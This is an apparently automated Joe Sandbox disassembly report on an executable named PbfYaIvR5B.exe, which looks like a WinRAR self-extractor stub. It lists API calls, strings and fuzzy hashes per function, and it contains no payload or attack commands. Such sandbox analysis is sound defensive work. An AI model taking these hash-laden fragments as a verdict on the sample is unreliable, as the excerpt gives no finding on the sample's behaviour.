                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00081030,00064674,00081030,?,?,00063F73,00000050,?,00081030,00000200), ref: 000697E9
                                                                                                                    • _free.LIBCMT ref: 0006981C
                                                                                                                    • _free.LIBCMT ref: 00069844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 00069851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 0006985D
                                                                                                                    • _abort.LIBCMT ref: 00069863
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005DC91
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 0004B92D: _wcsrchr.LIBVCRUNTIME ref: 0004B944
                                                                                                                    • _wcslen.LIBCMT ref: 0004C197
                                                                                                                    • _wcslen.LIBCMT ref: 0004C1DF
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0005CE9D
                                                                                                                      • Part of subcall function 0004B690: _wcslen.LIBCMT ref: 0004B696
                                                                                                                    • _swprintf.LIBCMT ref: 0005CED1
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0008946A), ref: 0005CEF1
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005CFFE
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004A275,?,?,00000800,?,0004A23A,?,0004755C), ref: 0004BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 0004BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: a78867796ec8b9a91eb3572c1820110ba7e6ffe36522b50109404561710a5b74
                                                                                                                    • Instruction ID: bc4397beaf765ba01a0e683fc04b3a85f25ee607c136cbe404b7aee8172b9ead
                                                                                                                    • Opcode Fuzzy Hash: a78867796ec8b9a91eb3572c1820110ba7e6ffe36522b50109404561710a5b74
                                                                                                                    • Instruction Fuzzy Hash: C941D4B1800215A6DF21BF24CCC1EEF77A9AF40391F048475F958A7152EB70EE94DAA8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0005B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 445417207-1780906847
                                                                                                                    • Opcode ID: d5a4ba1ee1e95ba0acd79c01a0e88614b7a272574b93395d329cd074912fea12
                                                                                                                    • Instruction ID: ef82a2eceb4dc6d2337a5fc014405065189aacf3a7f2378f6896b39bfb52c8ad
                                                                                                                    • Opcode Fuzzy Hash: d5a4ba1ee1e95ba0acd79c01a0e88614b7a272574b93395d329cd074912fea12
                                                                                                                    • Instruction Fuzzy Hash: 3111C472900119B6DB61AE649C4AFFF77ACFF5A712F004020FE45F6080D7A4AE4997B5
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0005B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005B767
                                                                                                                      • Part of subcall function 0005A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005B73D,00000066), ref: 0005A6D5
                                                                                                                      • Part of subcall function 0005A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A6EC
                                                                                                                      • Part of subcall function 0005A6C2: LoadResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A703
                                                                                                                      • Part of subcall function 0005A6C2: LockResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A712
                                                                                                                      • Part of subcall function 0005A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0005B73D,00000066), ref: 0005A72D
                                                                                                                      • Part of subcall function 0005A6C2: GlobalLock.KERNEL32(00000000), ref: 0005A73E
                                                                                                                      • Part of subcall function 0005A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005A762
                                                                                                                      • Part of subcall function 0005A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005A7A7
                                                                                                                      • Part of subcall function 0005A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0005A7C6
                                                                                                                      • Part of subcall function 0005A6C2: GlobalFree.KERNEL32(00000000), ref: 0005A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: 17c2ce2f9314478bcf51461b6f99cf3890ae1cc15ab2e71e6afa9b81178caf98
                                                                                                                    • Instruction ID: f9e47529f970b169d96733c4d3954626493b75863a762534fda1dd509ea688c5
                                                                                                                    • Opcode Fuzzy Hash: 17c2ce2f9314478bcf51461b6f99cf3890ae1cc15ab2e71e6afa9b81178caf98
                                                                                                                    • Instruction Fuzzy Hash: 9A01D236640A09A7D71277749C1AEBF7AB9AFC6B63F090110FD00A7292DF758D0D46A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0005D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: 425356066a46ec15f2bc941aaad31218917560bda55cc558ea6fd368ef55e715
                                                                                                                    • Instruction ID: 65116a067f14ff1726f55573e0ad3f9543922c335bcada3d6537ae0fce7b2d27
                                                                                                                    • Opcode Fuzzy Hash: 425356066a46ec15f2bc941aaad31218917560bda55cc558ea6fd368ef55e715
                                                                                                                    • Instruction Fuzzy Hash: E5012873244614BAE2308F649E0AF6B779CFB5AB03F114013FB05A20D0C6A6990AD779
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00067E24,00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002), ref: 00067E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00067EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00067E24,00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002), ref: 00067EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: a822a4c0c7ac8acaf809e6074064c875e851203131c5c197f6258060d4df39c1
                                                                                                                    • Instruction ID: 6c1d23ab6f78e0c304639882a798ea9e74257e65faaf1093b3def4bd1c759b14
                                                                                                                    • Opcode Fuzzy Hash: a822a4c0c7ac8acaf809e6074064c875e851203131c5c197f6258060d4df39c1
                                                                                                                    • Instruction Fuzzy Hash: 6BF06831D04208BBEB119FA4DC09B9EBFB5EF48715F0080A9F80DB6251DB3D9E85DA94
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0004F2E4
                                                                                                                    • GetProcAddress.KERNEL32(000881C8,CryptUnprotectMemory), ref: 0004F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: 4f4fa987bb9e88f22929a6797083fe5d83ec1f056b6d5763b04bfd451db95240
                                                                                                                    • Instruction ID: 3c447291bc27cef7712c6e8ae94b7766e24c4aa7f795e882e5891bb523f24706
                                                                                                                    • Opcode Fuzzy Hash: 4f4fa987bb9e88f22929a6797083fe5d83ec1f056b6d5763b04bfd451db95240
                                                                                                                    • Instruction Fuzzy Hash: D2E04F70D10712AEE7209F34984AB527AD46F04700B14C82DE1DEA7641DABCE5809B56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: 6e9742ab73e81e336ba13571cc6cd7fdae8285cc2ec38572b4f2f2c14fea919d
                                                                                                                    • Instruction ID: 3698c5f4857881cb6e26165087ed6a53db10f9da85097e87c8ea897f40b8101c
                                                                                                                    • Opcode Fuzzy Hash: 6e9742ab73e81e336ba13571cc6cd7fdae8285cc2ec38572b4f2f2c14fea919d
                                                                                                                    • Instruction Fuzzy Hash: AC512572600A12AFEB288F14D855BBE77E6FF54320F24452DEC05476A2E732ED90D790
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0006BF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006BF5C
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006BF82
                                                                                                                    • _free.LIBCMT ref: 0006BF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006BFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: 370c343e564e6acf1a0b2e8f051eb0aa11858206e0b892d45245505b0e381d7b
                                                                                                                    • Instruction ID: 1779c719e84fd26cd8c2821807b9ce0721a90b7b5693bd46483f2760222c6980
                                                                                                                    • Opcode Fuzzy Hash: 370c343e564e6acf1a0b2e8f051eb0aa11858206e0b892d45245505b0e381d7b
                                                                                                                    • Instruction Fuzzy Hash: 5801D4B2A012157F33212B765C4CDBB7BAEDFC2BA03144139FA08D2111EF658D41D6B0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,000691AD,0006B188,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006986E
                                                                                                                    • _free.LIBCMT ref: 000698A3
                                                                                                                    • _free.LIBCMT ref: 000698CA
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 000698D7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 000698E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: e3f08ce7e301c3edbd0e34ce58059f65e8ae824c01d43398b1a581841f89e389
                                                                                                                    • Instruction ID: 86c726a45ac3c1aa37e37411280740a344c7c6b59bb938bc952e1a71f7eca18f
                                                                                                                    • Opcode Fuzzy Hash: e3f08ce7e301c3edbd0e34ce58059f65e8ae824c01d43398b1a581841f89e389
                                                                                                                    • Instruction Fuzzy Hash: F90128366446016FE3263374AD85A6F26AFDFD37707200135F509B3593EE398C06A271
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000511CF: ResetEvent.KERNEL32(?), ref: 000511E1
                                                                                                                      • Part of subcall function 000511CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000511F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00050F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00050F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00050F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00050F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00050F6C
                                                                                                                      • Part of subcall function 00050FE4: WaitForSingleObject.KERNEL32(?,000000FF,00051206,?), ref: 00050FEA
                                                                                                                      • Part of subcall function 00050FE4: GetLastError.KERNEL32(?), ref: 00050FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 434ec879fec033063d6e9a18ddef096e0bb1f6c02d439a96978d264194a1664d
                                                                                                                    • Instruction ID: baad11a93576396afa5864905d08bb22a06734e2f739b4f9dc721f927a6905b6
                                                                                                                    • Opcode Fuzzy Hash: 434ec879fec033063d6e9a18ddef096e0bb1f6c02d439a96978d264194a1664d
                                                                                                                    • Instruction Fuzzy Hash: D1017571500B44EFE7229B64DC84BCAFBA9FB08711F000929F65F62560C7797A84DB94
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0006C817
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006C829
                                                                                                                    • _free.LIBCMT ref: 0006C83B
                                                                                                                    • _free.LIBCMT ref: 0006C84D
                                                                                                                    • _free.LIBCMT ref: 0006C85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: ffac03cc78dbd861e95aecffd679d272b64d926265acef7cdc725e4bdaa23fdd
                                                                                                                    • Instruction ID: 256a550a215189eef965896b401c28c255d5079fd1450d82bfec4408b5289c5c
                                                                                                                    • Opcode Fuzzy Hash: ffac03cc78dbd861e95aecffd679d272b64d926265acef7cdc725e4bdaa23fdd
                                                                                                                    • Instruction Fuzzy Hash: 2AF06232901201AFE670DB69E885C6673EFAB047147548C59F148E7553CF78FC80CB60
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00051FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00051FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00052006
                                                                                                                    • _wcslen.LIBCMT ref: 00052014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004B371,?,?,00000000,?,?,?), ref: 0005202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    • Opcode ID: 7d77bd174bb1ebc53ac18968f1c397d8a5feb88c3864061af3a514f57218b61b
                                                                                                                    • Instruction ID: 8f6c3da3f372fdc0980eb7d84f7f6cae8ea5c6eda4ad082f83a01e56e0667c73
                                                                                                                    • Opcode Fuzzy Hash: 7d77bd174bb1ebc53ac18968f1c397d8a5feb88c3864061af3a514f57218b61b
                                                                                                                    • Instruction Fuzzy Hash: EBF01D32008114BBDF265F51EC09DCE7F26EF45761B118415FA1A5A0A2CB7296A5D6E0
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0006891E
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 00068930
                                                                                                                    • _free.LIBCMT ref: 00068943
                                                                                                                    • _free.LIBCMT ref: 00068954
                                                                                                                    • _free.LIBCMT ref: 00068965
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d84fb9a51c1463aa1f8e525435025a672cb688994e4b8b443473835af61a73d0
                                                                                                                    • Instruction ID: 6a3faf137157fbe2d862ffd0565a157489e2e3e17f6b7e57b333349211c844c7
                                                                                                                    • Opcode Fuzzy Hash: d84fb9a51c1463aa1f8e525435025a672cb688994e4b8b443473835af61a73d0
                                                                                                                    • Instruction Fuzzy Hash: 60F08271912D22ABE6466F2CFC024853FB6F72A7143044766F418622B3CF3D4981DBA1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: 7e25beab4745a3a1288367fde82693646c831d8520be5cfa765c53170fc6781a
                                                                                                                    • Instruction ID: c111928df6c2decebb2aede2b4e039abeabdce10491fb73d1d1c725a24ca3003
                                                                                                                    • Opcode Fuzzy Hash: 7e25beab4745a3a1288367fde82693646c831d8520be5cfa765c53170fc6781a
                                                                                                                    • Instruction Fuzzy Hash: 7A512B7528C304F6F6311AA48D46FFF7265AB09B07F244506FF96640D2CAB2A45CA71E
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PbfYaIvR5B.exe,00000104), ref: 00067FAE
                                                                                                                    • _free.LIBCMT ref: 00068079
                                                                                                                    • _free.LIBCMT ref: 00068083
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                    • API String ID: 2506810119-2694767076
                                                                                                                    • Opcode ID: 78cfe4137e34b71ff3bf835b8ad04563dac1e167eab0912df308ea62889a83a3
                                                                                                                    • Instruction ID: 1648cce84e21795928619329099a674a39d6945c95f9c3cad1516b8904ac8f8c
                                                                                                                    • Opcode Fuzzy Hash: 78cfe4137e34b71ff3bf835b8ad04563dac1e167eab0912df308ea62889a83a3
                                                                                                                    • Instruction Fuzzy Hash: 3831C0B1A00618AFEB61DF98D880DDEBBFDEF85310F108266F50497212DB708E44CB61
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000631FB
                                                                                                                    • _abort.LIBCMT ref: 00063306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 7e84edcc26c859b4a37cfa70d8e06eb4ca01d0e82bb3d4093eeb558f1ecf3419
                                                                                                                    • Instruction ID: 20909eeec478258b05639b6e5e0e6ef78917b5ded1863193f755f116950dc79b
                                                                                                                    • Opcode Fuzzy Hash: 7e84edcc26c859b4a37cfa70d8e06eb4ca01d0e82bb3d4093eeb558f1ecf3419
                                                                                                                    • Instruction Fuzzy Hash: 4641687190020AAFCF15DF98CC81AEEBBB6BF48304F188059F904A7252D335AA50DB90
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00047406
                                                                                                                      • Part of subcall function 00043BBA: __EH_prolog.LIBCMT ref: 00043BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000474CD
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: 6f2e242dc7b419e4bf9fb67b416d055ecd5a3cfea448b546abbd230a173fb1d7
                                                                                                                    • Instruction ID: ffefc1c0592025c890f5ff0c99c1c6c4187b86cfbc846ead4f925dbd12309146
                                                                                                                    • Opcode Fuzzy Hash: 6f2e242dc7b419e4bf9fb67b416d055ecd5a3cfea448b546abbd230a173fb1d7
